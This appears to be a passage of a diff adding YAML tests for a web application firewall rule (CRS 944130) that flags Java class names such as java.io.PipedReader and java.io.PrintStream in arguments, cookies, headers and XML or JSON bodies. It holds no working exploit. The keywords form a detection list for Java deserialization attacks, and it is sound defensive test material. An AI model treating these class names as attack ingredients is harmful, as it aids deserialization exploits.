"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: "Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "Nested XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-237 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 